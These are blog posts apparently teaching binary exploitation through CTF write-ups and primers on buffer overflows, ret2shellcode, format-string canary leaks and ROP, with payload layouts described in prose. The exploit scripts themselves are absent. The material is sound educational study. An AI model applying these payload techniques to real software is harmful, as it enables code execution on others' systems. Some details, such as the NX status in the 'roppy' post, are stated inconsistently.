Search This Blog

Friday, March 22, 2024

[rev] intro to reversing - PROLOGUE


reversing is definitely one of the most hardest and most rewarding skillsets one can possess within cybersecurity, along with being an exploit developer. this post serves as a prologue, succeeding many reversing writeups I plan on publishing on this blog. I plan on going over the most basic "Hello World" C program and go further in developing the program by small adding lines of code little by little to see how changes are made in disassembly.

I'm making this blog post[s] mainly due to the fact that I've seen inadequacies within my own knowledge base when it comes to reverse engineering. The most fun and effective way to learn anything within security, is through CTF. that goes without saying as not only does it encourage one to get their hands dirty, earning them exposure badges, it allows one to incorporate auto-didactive learning, a learning technique that involves one taking the time out to do online research to, step by step, gathering technical information relevant to the challenge, adding them all together to finally get to the flag, of which that earns one points. It's sort of like a treasure hunt. The flag is the treasure and the clues are the tiny bits and pieces of information Google assist you with (Google's the plug fr lol.). I've been engaged in CTF for a number of years and only now, I realize that the points that one earn, does not matter. the real reward/treasure is the actual learning experience. What technical detail were you exposed to before finally getting the flag? How did it challenge your current knowledge base? It's those questions that one needs to ask themselves...especially if you utilize CTF as a means to have fun and also build real world technical skills.

Everybody has a goal in the field (obviously), as with every field out there besides Cybersecurity. And the path towards that goal is never straight-forward. However, in the context of reverse engineering programs or software, the path is clear cut. Of course you can cut corners, depending on your overall IT skills and how "tech savvy" you are. Do so, if you so wish to. Eventually, the need for a deep understanding of fundamentals will catch up with you and you'll find yourself going back to the beginning, as is the case for me at the time of writing this.

Why didn't I just start out with fundamentals from the beginning? It's simple. Because when I first started, the basics were way too boring. Luckily, CTF filled that void by integrating gamification and real world technical skills together, allowing me to see my progress and move further. Trial and error, reading writeups and just emerging myself in the challenges over and over again allowed me to at least have fun while learning the topics I loved the most. 

As stated earlier, my skillset has now reached a stagnant point and I'm definitely not satisfied with it. CTF challenges are now boring, not because they are not engaging and enticing enough, but because my "amateur" skillset does not suffice any longer. I have to increase my knowledge base within reversing to once again rekindle the joy I once had.

Aside from reverse engineering, is writing exploit scripts, or being an exploit developer. this blog has actually showcased quite a number of CTF binary exploitation challenges write-ups. I've well documented the process, techniques and patterns of discovering vulnerabilities within these challenges and writing the exploits that will leverage the vulnerabilities found to ultimately get the flag. These challenges peak my interest just as much as reversing does, but I can easily and confidently say that reverse engineering remains as a paramount skillset for all exploit developers. professional or CTF player alike. After all, the vulnerabilities are all memory corruption based. 

So if I am to eventually achieve this goal, I have to increase my skillset. I have to leave CTF alone for now and hit the books! I'm confident enough to say that I believe in my ability to achieve this goal.

Thanks for reading this far if you have. Just wanted to lay a bit of foundation as well as express my own motivations as to why I'm making these next few blog posts. I'll go over quite a bit: Assembly language, using gdb as a debugger to debug software, understanding stack and heap memory and how it relates to reversing, understanding GUI reversing tools like IDA as well and many more so be sure to look out for those. Lots of planning will go into these next few so i'm amped for the challenge. Maybe at the end, I'll do a 'crackme' reversing challenge showcasing how a typical workflow and thought process will look like. 







Saturday, February 24, 2024

[pwn-primer] understanding ret2shellcode + understanding stack based buffer overflow

This post is going to cover an essential pwn technique called ret2shellcode or is commonly referred to as Shellcode Injection. In a typical pwn challenge (especially if it's easy), we'll have a win() function to redirect program execution to in order to solve the challenge. However, there are instances where there is no win function. This is when this technique comes in.

Shellcode, in essence, are assembly instructions that can execute arbitrary commands. In real exploits, they're used to either spawn a shell (either root/admin or low privilege) or execute commands like display contents of a critical file. In the case of pwn CTF challenges, their used to spawn a root shell to get the flag on the remote server or to display the contents of flag.txt. 

I'll go over a simple program that can be exploited with the use of shellcode.


The program above is quite simple in nature. It just has a main function that defines a character buffer on the stack of 256 bytes. After a printf call is made displaying the address in memory of where the buffer_one character buffer is located. After, a gets call is made into the buffer_one buffer.

Guess this is a good time to explain the vulnerability.

The vulnerability in this program here is found at the gets call. Why? Because we see the buffer_one character buffer has been given a length of 256 bytes on the stack. However, the gets call here asks for user input. The vulnerability lies in the fact that the gets() call does not make sure that exactly 256 bytes have been written to that buffer. The user input can exceed 256 bytes, thus accessing arbitrary memory locations. 

All this is occuring in a data structure in memory called the stack. Every function in C programs, at runtime, is initialized with a stack (or sometimes refered to as a stack frame). These stack frame hold the local variables of the functions they are defined in. For example, in the program above, there is one stack frame for the 'main' function and the character buffer is considered to be 'local' to the main function stack frame. This data structure operates using PUSH and POP operations. These PUSH and POP instructions PUSH data onto the stack and POP data off of the stack. 

A buffer overflow vulnerability can occur on the stack or on another data structure that deals with dynamically allocating space in memory called the heap, but for this post we will focus on the stack. A stack overflow vulnerability in this case means we can overwrite past the specified buffer size, accessing other important sections on the stack, such as other local variables, the base pointer and even one other important register, the saved return address.

On the stack, the return address is essentially an address that points to where execution is supposed to be redirected to once that respective function has finished execution. By overwriting this saved return address with an address of our own, we can redirect execution to whatever we want. 

Let's go back to the program and see this in action. 

After compiling the program in gcc, we see the program output once executed. 


As seen in the source code, the program outputs the address of where the stack is in memory. The next line shows an empty space, symbolizing a hang. This is where the gets() call is being initiated. By inserting more than 256 bytes, the program should crash. A crash in the program confirms the presence of the buffer overflow vulnerability. 


Junk bytes inserted into the program results in a segmentation fault. The program has crashed and the vulnerability is confirmed. There's no win function to redirect execution to, as discussed before and shellcode will have to be used. pwntools is a python based library that assists with exploit script writing. This library hosts a host of shellcode to perform different operations across different architectures. In our case, we're working with a 64 bit program, so the shellcode assembly instructions will be 64 bit.

execve('/bin/sh') syscall shellcode


the shellcode above execute an execve syscall that executes the path '/bin/sh' as the parameter to spawn a shell. If you're not well versed in how 64 bit functions and parameters are placed in assembly, then I recommend you get yourself informed on that. The first 4 instructions push the string '/bin/sh' represented by 0x732f2f2f6e69622f onto the stack and finally inserts it into rdi. The following instructions perform XOR and stack PUSH POP operations and ultimately calls execve().

Final Exploit Script


exploit script is quite simple. most of it is utilizing pwntools methods. I can't overemphasize how easy pwntools has made writing exploits. All the script does is use the shellcraft.sh(), which is the equivalent to the execve syscall we saw above, except in this instance is accessible through shellcraft.sh(). After the next section simply takes the outputted stack address and converts it to base 16, which is hexadecimal and prints that out to the screen. Lastly, the real payload is organised in order. 256 bytes of capital A's (junk bytes) and appends the shellcode to it to fill the buffer_one buffer on the stack, fill the rbp register with more junk bytes (0xcafebabe) and finally point rip to the buffer address where the stack is located. This basically inserts the shellcode onto the stack, and ultimately redirects execution to where the shellcode has been injected, ultimately executing our own code. 

the exploit ran and we can see we have shell. Quite a simple technique. I'm sure i butchered some of the explanation but essentially this is how shellcode works. We inject it onto the stack of a vulnerable process and have execution point to where the shellcode is injected to.


Thursday, February 22, 2024

[pwn primer] understanding format string vulnerabilities + bypassing stack canary protection

Previously, we've covered techniques like ret2shellcode, which involves injecting shellcode into a vulnerable process to ultimately execute whatever code we want and the use of ROP gadgets, which is ultimately a code reuse attack. We use the code located within the vulnerable program, specifically assembly instructions ending with the 'ret' instruction, to setup the stack to in turn execute whatever code we want, bypassing the Non executable bit that prevents us from injecting shellcode onto the stack and have it execute. 

Another exploitation technique is the use of format string exploits. This technique involves exploiting format specifiers in C. Manipulating format strings in C can basically allow one to read and write from arbitrary memory locations. I've created a reasonably easy C program that's vulnerable to format string vuln. Let's have a look at it and take it from there.



the main function calls vuln, which initializes a buffer on the stack of 64 bytes. after a couple of puts and gets calls are made. puts just outputs predefined text onto the screen and gets is the vulnerable function, vulnerable specifically to a buffer overflow (read man pages to see dangers of using gets). To cut the story short, gets() basically prompts for user input, without providing any bounds checking on how much input is being inserted. 

the format string vulnerability can be spotted on line 13. the printf function in C usually requires a format specifier, specifying how printf should "print" data onto the screen. these specifiers can be seen as %d for decimal, %s for strings etc (more can be found online). in this case, the code does not tell printf how to print the data, hence showing the presence of the vulnerability. We can feed printf any specifier we want and see what contents are spewed from the program.

How does this vulnerability benefit anyone? I'll show you how.

The format string vulnerability can be used to either read or write from arbitrary areas in memory. This can serve useful to us in instances where certain exploitation mitigations such as ASLR or stack canaries need to be bypassed. This post will also go into actually compiling and exploiting the vulnerable program above. This program mimics an easy/medium pwn challenge. Looking at the code overall, we also see a win() function, so this also shows that this is more of a ret2win type of challenge. 

p.s ret2win basically just means that the vulnerable pwn challenge contains a 'win' function that program execution needs to be redirected to, in order to solve the challenge. the 'win' function isnt called initally. that's why the program execution needs to be redirected to that function (usually done when there's a buffer overflow vuln).

The code above can be compiled using the flags in the commented section (one for 32 bit and 64 bit). This demo will look into x64 bit.

After compiling the program, let's have a look at the binary protections and see what exploit mitigations are enabled to have a feel on what we're dealing with.


We have 2 protections enabled. a stack canary and NX bit. The NX bit, we've already discussed. it basically just renders shellcode injections useless as the stack is non executable. cool. but the stack canary is what we haven't covered... and I'd like to do that now.

The stack canary is simply a random value placed on the stack meant to prevent buffer overflows from being successful. Specifically, it is a random value that starts with '/x00' placed at rbp-0x8 (8 bytes before the base pointer in x64). To give more clarity on this, let's have a look at the vulnerable program in a disassembler and see the main function disassembled and see how the canary is initialised.


A quick IDA inspection shows the execution branches of the vuln function where most of the program functionality is. the function prologue at the very beginning shows how 50h bytes have been reserved for this current function on the stack, right after that we see fs:28h being moved into the rax register, and then that value being inserted into a memory location located at rbp+0x8. This is the stack canary being initialised. In gdb, the location is actually at rbp-0x8 instead of rbp+0x8 so it just depends on where you look at it. 

At the end, we see the stack canary being compared with what is on the stack. if the user input overwrited rbp-0x8 or rbp+0x8, and whatever is being written at that area in memory does not equate to the random value assigned by the program at runtime, then the __stack_chk_fail will be called, showing that a buffer overflow has been attempted and the program will exit. 

That's how a stack canary works. 

Since the program has initialized a random value at rbp-0x8, then we need to find a way to use the format string vuln to leak the canary value from the stack, as that will be the mechanism with which the canary protection can be bypassed in this instance. Besides this, you can bruteforce the canary byte by byte, but right now the format string can allow us to leak it directly from the stack.

by inserting %p into the program, we can leak the contents of the stack to stdout, and it turns out that the canary can be found at the 15th position of %p inserted into the program.



since the canary starts with '/x00' as stated earlier, we know that this is the canary. It is shown this way in the leak because of endianness. Least significant byte to be more precise. However, the canary changes with every execution to ASLR being enabled on my system, so the final exploit script will automate this process and make it cleaner. Aside from that, this is how the format string vuln can be used. This is an essential pwn technique and can get a lot more advanced than this. This is as basic as it gets.

The final exploit payload will be the padding + canary_leak + additional 8 bytes to overwrite rbp + address to win function (overwrite rip address with win function)

Final Exploit Script



The exploit script is quite small, but all it will do is exploit the format string vuln to leak the canary to ultimately bypass it. As seen above, once the exploit script is ran, it leaks the canary when the script executes the vulnerable process and shows us the message "you win" signifying that we've successfully redirected execution to the win() function.

Hopefully this gave a bit more light as to how the format string works. This vulnerability can be discovered and used in other ways not mentioned here, but this is enough to serve as a primer to beginners or intermediate pwners who want to up their game up with pwning. Learning the art of pwn requires knowledge of reversing, which is a topic worthy of being discussed in another blog post I will do in future. 

More resources:

pwn.college - Hacking platform maintained by Arizona State University. They also host lectures available on twitch and youtube. Highly recommended for beginner pwners.

CTF-Wiki - Overall CTF wiki teaching basics of pwn as well as other hacking challenges like Crypto, Web and Forensics. Highly Recommended (Translate page to English as its originally compiled in Mandarin)










Saturday, February 17, 2024

[pwnable_tw - pwn] start (100 pts)

This pwn challenge is quite easy. got nervous at first but eventually got it. challenge provides a netcat IP and port to connect to, to run the exploit script against as well as the 32 bit binary that's running on that port for local debugging. so, let's look at the binary.



Challenge has every protection disabled which just indicates any shellcode injection into the challenge process will work as the stack is executable. Running the binary just asks for user input and simply exits after input is given. Let's look at what's happening under the hood.

The binary is stripped so the symbols are not present for us to see. However a entry function is present in the disassembly.


entry0() function does a few things:

- pushes esp and _exit onto the stack

- performs xor operations on eax, ebx, ecx and edx (which basically zeroes out these registers)

- pushes a total of 20 bytes onto the stack (which turns out to be the "Let's start the CTF:" string the binary outputs when it executes)

- calls write() syscall (represented by mov bl, 1 instruction)

- calls read() syscall (represented by mov al, 4 instruction) and recieves input of 60 bytes in length

- Adds 20 bytes of address in esp

- finally a 'ret' instruction is called, with eip pointing to _exit() function (0x804809d = _exit() address)


To exploit the challenge, a couple of things need to be done. Firstly, we need to utilise the buffer overflow vuln to have eip control to eventually leak the stack address. since NX bit is disabled, shellcode injection into challenge process is viable, with a twist. usually a 'jmp esp, instruction would be used to have program execution jump to the injected shellcode as its located on the stack when its injected. However, the 'jmp esp' gadget is not in the binary so another gadget has to be used to perform the same thing, to leak the stack address.


The gadget above is actually similar to the instructions within the entry binary, specifically from the ret instruction, backwards to the mov ecx, esp. If analyzed carefully, this sets up eip to point to the state in the program before sys_read syscall is invoked (state of program before sys_read = 0x08048086 approx., sys_read call invokation = 0x08048087)


the payload = padding (input buffer to eip_control offset) + stack address + length of the padding + shellcode. As seen above, padding, which is user input starts at esp + 0 which is the offset pointing to the top of the stack. shellcode was extracted from shellstorm website.

Normally the padding would be a bunch of 0x41(A) until eip control but utilising a NOP sled (bunch of 0x90 instructions that do nothing) yielded a more successful result.

Final exploit script





pwned.

 


Tuesday, February 6, 2024

[imaginaryCTF - pwn] roppy (75 pts)

Hi. back with another writeup for the imaginaryCTF 'roppy' pwn challenge. This challenge is old but still a good one to brush up on basic pwning.

Challenge description:


Challenge description shows that it's just another rop challenge. means that the stack protection NX is probably enabled. we can run checksec on the binary to confirm the suspicion:


As suspected, NX is disabled. So ret2shellcode attack won't work. User input to saved return address (RIP) control is 72 bytes. This can be calculated by creating cyclic paattern of 100 bytes, insert binary into pwndbg (gdb extension), and calculate offset with 'cyclic -l'


next, we jump to the middle of the main function to execute system(/bin/sh) to finally get shell. Can find the address of the middle of the main function in gdb.

Exploit script.




exploit script works. we get shell!